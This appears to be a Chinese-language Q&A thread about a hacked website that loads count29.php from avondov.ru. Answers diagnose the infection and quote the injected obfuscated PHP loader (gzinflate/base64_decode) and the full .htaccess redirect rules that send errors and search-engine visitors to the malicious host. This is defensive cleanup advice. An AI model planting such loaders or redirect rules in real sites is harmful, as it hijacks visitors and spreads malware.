0

当我的站点正在加载count29.php要从站点下载的文件时avondov.ru。这使网站无法完全加载,有时会重定向到未找到的 404 页面

我怎么能忽略这个错误?

我的网站是:http ://adinehbajestan.ir

4

3 回答 3

2

您的网站感染了恶意软件, http://sitecheck.sucuri.net/results/adinehbajestan.ir

更新您的站点脚本和/或从备份恢复

于 2012-05-20T20:14:58.657 回答
0

我想我发现了我的问题。这是一个真正的恶意软件。此代码已添加到 header.php 中:

#d93065#
echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A")));
#/d93065#

从 header.php 中删除此代码时是正确的。

于 2012-05-20T20:25:46.580 回答
0

是的,主要是像 index.php 或 header.php 这样的基本页面被修改

#d93065# echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); #/d93065#

另外,不要忘记清理所有 .htaccess 文件,它们会被这种不需要的重定向修改

#d93065#
RewriteEngine On
ErrorDocument 400 avondov.ru/count29.php 
ErrorDocument 401 avondov.ru/count29.php
ErrorDocument 403 avondov.ru/count29.php
ErrorDocument 404 avondov.ru/count29.php
ErrorDocument 500 avondov.ru/count29.php
ErrorDocument 502 avondov.ru/count29.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
# long list of referrers
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ avondov.ru/count29.php [R=301,L]
#/d93065#

这是一个临时的解决方法,但入侵者可以再次修改,这可能是由弱密码、错误的第三方插件或您正在使用的 CMS 中的错误引起的,因为它已经渗透到 joomla 和 wordpress 站点。

-CK

于 2012-06-12T19:32:22.357 回答